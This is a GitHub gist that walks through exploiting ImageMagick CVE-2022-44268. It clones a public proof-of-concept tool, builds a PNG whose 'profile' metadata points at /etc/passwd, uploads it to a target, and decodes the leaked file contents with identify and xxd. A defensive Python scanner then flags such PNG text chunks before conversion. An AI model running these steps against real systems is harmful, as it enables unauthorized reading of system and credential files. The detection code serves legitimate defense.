  • Save strikoder/f5e743bbd00685453bb0b990f0aa22a5 to your computer and use it in GitHub Desktop.

Select an option

Save strikoder/f5e743bbd00685453bb0b990f0aa22a5 to your computer and use it in GitHub Desktop.
ImageMagick 7.1.0-49 LFI (CVE-2022-44268) - Read arbitrary files through malicious PNG with embedded Profile field, exploiting metadata processing to extract sensitive data

ImageMagick LFI via Profile Metadata Injection (CVE-2022-44268)

Vulnerability Overview

CVE-2022-44268 affects ImageMagick 7.1.0-49 and allows arbitrary file read through crafted PNG images. This exploit chain leverages two vulnerabilities:

  1. DoS via "-" as filename: supplying "-" as the filename causes the program to hang
  2. LFI via Profile metadata: injecting a Profile field into the PNG text metadata makes ImageMagick read an arbitrary file from the host

Scenario

  • Target: ImageMagick 7.1.0-49 processing images
  • Attack Vector: Malicious PNG with embedded Profile metadata
  • Goal: Extract sensitive files (e.g., /etc/passwd, /var/db/pilgrimage)

Exploitation Steps

1. Create Malicious PNG with LFI Payload

# Clone the LFI PoC tool
git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc
cd imagemagick-lfi-poc

# Install dependencies (if needed)
pip3 install pypng

2. Generate Exploit Image

# Create PNG with Profile pointing to target file
python3 generate.py -f /etc/passwd -o exploit.png

The script embeds Profile: /etc/passwd into the image metadata. When ImageMagick processes the image, it treats that value as a path, reads the file, and includes its contents in the metadata of the resulting image.

3. Upload and Trigger Processing

# Upload the malicious PNG to the target system
# Wait for ImageMagick to process it (via cron job, web upload, etc.)

4. Download and Extract File Contents

# Download the processed image
# Extract metadata with verbose output
identify -verbose exploit.png > img.hex

# Convert hex dump to readable format
cat img.hex | xxd -r -p
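From the defender's side, the same metadata field the steps above rely on can be checked before an upload ever reaches ImageMagick. The following is an added example, not part of this gist or of the linked PoC tool: a small PNG chunk walker that validates the signature, chunk lengths and CRCs, decodes tEXt, zTXt and iTXt chunks, and flags any text chunk whose keyword is "profile" (case-insensitive). The sample PNGs, the helper names and the placeholder values are constructed for this example; the flagged sample carries a deliberately meaningless string rather than a real path.

```python
"""Flag PNG text chunks keyed 'profile' before handing files to ImageMagick (CVE-2022-44268 pre-screen)."""
import struct
import sys
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNK_TYPES = {b"tEXt", b"zTXt", b"iTXt"}


def iter_chunks(data):
    """Yield (chunk_type, body) for every chunk, rejecting truncated chunks and bad CRCs."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_bytes) != 4:
            raise ValueError("truncated chunk %r" % ctype)
        # The PNG CRC covers the type field and the body, not the length.
        if struct.unpack(">I", crc_bytes)[0] != zlib.crc32(ctype + body):
            raise ValueError("CRC mismatch on chunk %r" % ctype)
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":
            break


def decode_text_chunk(ctype, body):
    """Return (keyword, text) for a tEXt, zTXt or iTXt chunk body."""
    keyword, _, rest = body.partition(b"\x00")
    if ctype == b"tEXt":
        text = rest
    elif ctype == b"zTXt":
        # zTXt: one compression-method byte, then a zlib stream.
        text = zlib.decompress(rest[1:]) if len(rest) > 1 else b""
    else:
        # iTXt: compression flag, compression method, language tag\0, translated keyword\0, text.
        compressed = rest[:1] == b"\x01"
        after = rest[2:]
        _lang, _, after = after.partition(b"\x00")
        _translated, _, text = after.partition(b"\x00")
        if compressed:
            text = zlib.decompress(text)
    return keyword.decode("latin-1"), text.decode("utf-8", "replace")


def find_profile_text_chunks(data):
    """Return [(chunk_type, keyword, text)] for every text chunk keyed 'profile'."""
    hits = []
    for ctype, body in iter_chunks(data):
        if ctype in TEXT_CHUNK_TYPES:
            keyword, text = decode_text_chunk(ctype, body)
            if keyword.strip().lower() == "profile":
                hits.append((ctype.decode("ascii"), keyword, text))
    return hits


def is_safe_png(data):
    """True only for a structurally valid PNG with no 'profile' text chunk; malformed input is rejected too."""
    try:
        return not find_profile_text_chunks(data)
    except ValueError:
        return False


# --- constructed sample fixtures (not real uploads) -------------------------
def _chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def build_sample_png(text_chunks=()):
    """Build a 1x1 8-bit grayscale PNG with the given (type, body) text chunks inserted after IHDR."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    out = PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
    for ctype, body in text_chunks:
        out += _chunk(ctype, body)
    out += _chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _chunk(b"IEND", b"")
    return out


PLACEHOLDER = b"PLACEHOLDER-NOT-A-REAL-PATH"  # constructed value, stands in for whatever an attacker would put here
BENIGN_PNG = build_sample_png([(b"tEXt", b"Comment\x00constructed sample")])
FLAGGED_PNG = build_sample_png([(b"tEXt", b"profile\x00" + PLACEHOLDER)])
FLAGGED_ZTXT_PNG = build_sample_png([(b"zTXt", b"Profile\x00\x00" + zlib.compress(PLACEHOLDER))])

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, "SAFE" if is_safe_png(fh.read()) else "REJECT")
```

Run it as `python3 scan_png.py upload1.png upload2.png` in front of the conversion step; anything that is not a clean PNG, or that carries a profile keyword in any of the three text chunk types, is rejected before ImageMagick sees it. This is a screening control for the specific primitive described on this page, not a substitute for upgrading ImageMagick to a release that no longer resolves the profile value as a path.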